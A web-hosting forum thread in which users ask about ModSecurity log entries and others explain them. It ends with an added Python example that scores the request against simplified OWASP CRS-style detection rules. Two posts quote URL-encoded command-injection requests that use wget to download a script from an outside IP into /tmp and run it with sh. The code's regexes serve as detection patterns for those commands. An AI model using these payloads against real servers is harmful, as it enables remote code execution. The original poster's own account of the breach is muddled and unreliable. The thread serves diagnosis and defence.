
SOLVED Entry in Mod Security Log question

Discussion in 'Security' started by webstuff, Jun 25, 2018.

  1. webstuff

    webstuff Well-Known Member

    Joined:
    Jul 19, 2011
    Messages:
    71
    Likes Received:
    1
    Trophy Points:
    58
    We recently found some scripts that look pretty nasty. Anybody have any idea what this person was trying to do?

    GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$

    thanks
     
  2. sktest123

    sktest123 Well-Known Member

    Joined:
    Jan 31, 2017
    Messages:
    99
    Likes Received:
    6
    Trophy Points:
    8
    Location:
    kochin
    cPanel Access Level:
    Root Administrator
    Sort of command injection, via a PHP CGI query string; it seems to be trying to download a remote shell script to tmp and execute it.
     
  3. cPanelMichael

    cPanelMichael Technical Support Community Manager
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    45,214
    Likes Received:
    1,936
    Trophy Points:
    363
    cPanel Access Level:
    Root Administrator
    Hello,

    The previous post includes an accurate description of what it looks like the attack was attempting to do. Let us know if you have additional questions.

    Thank you.
     
  4. webstuff

    webstuff Well-Known Member

    Joined:
    Jul 19, 2011
    Messages:
    71
    Likes Received:
    1
    Trophy Points:
    58
    There was a security issue with a php file and tmp files were being deleted.

    I'm not sure if this helps any.

    Uptime: 123 seconds
    Executable:
    /usr/bin/php
    Command Line (often faked in exploits):
    /usr/bin/php
    Network connections by the process (if any):
    tcp: 127.0.0.1:33596 -> 127.0.0.1:3306
    tcp: 127.0.0.1:33598 -> 127.0.0.1:3306
    Files open by the process (if any):

    /usr/local/apache/logs/error_log
    /usr/local/apache/logs/error_log
    /tmp/.ZendSem.gYLBCK (deleted)
    /tmp/ZCUDi4colR (deleted)


    I have more of the log too. Any other ideas or suggestions on where to look? I see they are trying to connect... They tried to connect 30 times today too.
     
  5. cPanelMichael

    cPanelMichael Technical Support Community Manager
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    45,214
    Likes Received:
    1,936
    Trophy Points:
    363
    cPanel Access Level:
    Root Administrator
    Hello,

    Can you expand on this statement? For instance, did you remove the PHP file and confirm the issue persists?

    Thank you.
     
  6. webstuff

    webstuff Well-Known Member

    Joined:
    Jul 19, 2011
    Messages:
    71
    Likes Received:
    1
    Trophy Points:
    58

    Yes I did remove the php hole, or at least I believe I did. So far I haven't seen any funky stuff but I have seen this. The only other question I have with this is: do you think there is any chance they could have gotten my mysql database login? In other words, when you see this sort of log I assume you wouldn't need the mysql password/username, correct? Or is there a possibility? Also I can provide whatever else if you would like too. I do have some of the original files for some items. (The entire website was a complete mess. I had contacted my hosting provider, talked to the security team, and they kept telling me I had nothing to worry about, but I just didn't buy that, so this is sort of a learning experience for me too. After I started removing the stuff I stopped getting high server alerts, other alerts, etc.) But I do see connections like that in my mod security. Just want to be 110% sure I am not missing anything. Also I did happen to find some advanced malware link, I believe, to where it installs a virus in the firm I believe. And if I understand everything correctly it's one of those where if you wipe the drive (complete format) it still stays on the system. Plus there were open folders, public keys, etc. I do not believe anything got changed, but then again from my newbie side of details I always could be missing something. There is other stuff that isn't going on which gives me the reason to believe I got it too. I will gladly PM any details too.

    Thank you again so much for the help.

    Thank you again.
     
  7. cPanelMichael

    cPanelMichael Technical Support Community Manager
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    45,214
    Likes Received:
    1,936
    Trophy Points:
    363
    cPanel Access Level:
    Root Administrator
    Hello @webstuff,

    It's difficult to know for sure the extent at which the attacker was able to gain access to your website's files and passwords (assuming they were stored in a PHP configuration file). For additional investigation, it's generally a good idea to consult with a qualified system administrator. We provide a list of companies offering system administration services at:

    System Administration Services | cPanel Forums

    Additionally, we provide some more information about our Technical Support Department's ability to troubleshoot issues stemming from a hacked server at:

    Why can't I clean a hacked machine - cPanel Knowledge Base - cPanel Documentation

    Thank you.
     
  8. webstuff

    webstuff Well-Known Member

    Joined:
    Jul 19, 2011
    Messages:
    71
    Likes Received:
    1
    Trophy Points:
    58
    Yes I removed the files. In mod security it's showing they were trying to connect to 127.0.0.1. Can anyone point me in the right direction on this? It's showing blocked each time. Or any thoughts at all?
     
  9. webstuff

    webstuff Well-Known Member

    Joined:
    Jul 19, 2011
    Messages:
    71
    Likes Received:
    1
    Trophy Points:
    58
    OK, just saw that; I looked into that. Haha, actually some top people were hired and they said they saw nothing and it was nothing to worry about. They thought it was email or some other files, which clearly wasn't correct. I am glad I kept investigating. I will keep you posted.
     
  10. webstuff

    webstuff Well-Known Member

    Joined:
    Jul 19, 2011
    Messages:
    71
    Likes Received:
    1
    Trophy Points:
    58
    Just so everyone knows, after digging around I found out that there was a php script that was compromised. Turns out that the one version of php, when you get it to crash correctly with the mysql, would then show the login for mysql, so then the hacker used the cross scripting, X-Frame-Options, X-Content, HTTP Strict Transport, etc... So they would make their script http://localhost/whatever on their machine, then cross into the website with an action of post, get, etc. Then they would select or inject mysql and grab sessions or hijack them that way. Anyways, after doing so much searching myself, lots of lost hours, me annoying web hosting companies and really no help, this is what I came across.

    It was sort of upsetting because I contacted the web hosting companies, security companies, etc. and noooooo help... They just kept telling me it's normal for that to run. And I would always say this sort of load shouldn't be going on. Anyways, after hours and hours, easily 100 something, reading and spending with firms, I finally found out it was this. Not to mention the website has easily over a million files, which only makes it more difficult. But I hope this information will help others.

    Mark it closed.... As for everyone else, thanks for helping and pointing me in the right direction, you know who you are.
     
    cPanelMichael likes this.
  11. TheGrumpyOne

    TheGrumpyOne Registered

    Joined:
    Mar 9, 2017
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    United States
    cPanel Access Level:
    Root Administrator
    Hello,
    I am finding this string in my log file.

    GET /login.cgi?cli=aa%20aa%27;wget%20http://1.2.3.4/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$

    I've been getting these the last 3 weeks. Has anyone come up with a way to block this?
    I have OWASP, but I'm a noob when it comes to writing rules and don't want to screw things up.
    Thanks in advance for the Help!
     
  12. fuzzylogic

    fuzzylogic Well-Known Member

    Joined:
    Nov 8, 2014
    Messages:
    93
    Likes Received:
    51
    Trophy Points:
    18
    cPanel Access Level:
    Root Administrator
    You should not need to write rules for requests like these.
    I would expect the OWASP CRS to block requests like this if it is set up properly and working.

    In my test using the cPanel-provided rules:
    OWASP ModSecurity Core Rule Set V3.0
    SpiderLabs OWASP curated ModSecurity rule set

    This request triggered the remote command injection rule ids 932105 and 932115 scoring 5 anomaly points each.

    The 10 anomaly points triggered blocking rule id 949110
    Message: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score.

    The 10 anomaly points triggered logging rule id 980130
    Message: Warning. Operator GE matched 5 at TX:inbound_anomaly_score.
    [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=0,HTTP=0,SESS=0)
    Remote Command Execution: Windows Command Injection"]
     
    cPanelMichael likes this.
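To show how the CRS anomaly scoring fuzzylogic describes (two CRITICAL rules at 5 points each, blocked by 949110 once the inbound score reaches the threshold) arrives at the 403, and how the URL-decoded query string from post 2 ends up containing a chained wget/sh command, here is an added Python example that is not part of this thread, of cPanel, or of the OWASP CRS. The two regexes are hypothetical, much-simplified stand-ins for rules 932105 and 932115, and the sample request lines are constructed from the shape posted above (using the 1.2.3.4 variant).

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample request lines: the shape reported in this thread plus a
# benign request for contrast. Not taken from any real log.
SAMPLE_REQUESTS = [
    "GET /login.cgi?cli=aa%20aa%27;wget%20http://1.2.3.4/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$",
    "GET /login.cgi?cli=status",
]

# Hypothetical, simplified stand-ins for CRS rules 932105 and 932115. The real
# rules are long generated regexes; these only capture the shape seen here.
RULES = [
    (932105, re.compile(r"[;|&`]\s*(?:wget|curl)\s+https?://"), "remote fetch chained after a separator"),
    (932115, re.compile(r"[;|&`]\s*(?:sh|bash)\s+/tmp/"), "execute a file staged under /tmp"),
]
CRITICAL_POINTS = 5    # CRS assigns CRITICAL rules 5 anomaly points each
INBOUND_THRESHOLD = 5  # CRS default; rule 949110 blocks when score >= this (operator GE)


def decode_args(request_line):
    """Split 'METHOD /path?query' and URL-decode each argument, like ModSecurity's ARGS."""
    _method, _, target = request_line.partition(" ")
    args = {}
    for pair in urlsplit(target).query.split("&"):
        name, _, value = pair.partition("=")
        args[unquote_plus(name)] = unquote_plus(value)
    return args


def score_request(request_line):
    """Run every rule over every decoded argument and return the anomaly verdict."""
    matched = []
    for name, value in decode_args(request_line).items():
        for rule_id, pattern, _desc in RULES:
            if pattern.search(value):
                matched.append((rule_id, name))
    score = CRITICAL_POINTS * len(matched)
    return {
        "score": score,
        "rules": sorted(rule_id for rule_id, _ in matched),
        "blocked": score >= INBOUND_THRESHOLD,  # the decision 949110 makes
    }


if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        verdict = score_request(line)
        status = "403 (blocked)" if verdict["blocked"] else "allowed"
        print(f"{status:14} score={verdict['score']:2} rules={verdict['rules']} {line[:60]}")
```

The first request decodes to a value containing `;wget http://... ;sh /tmp/...`, matches both stand-in rules for a score of 10, and is blocked; the benign request scores 0.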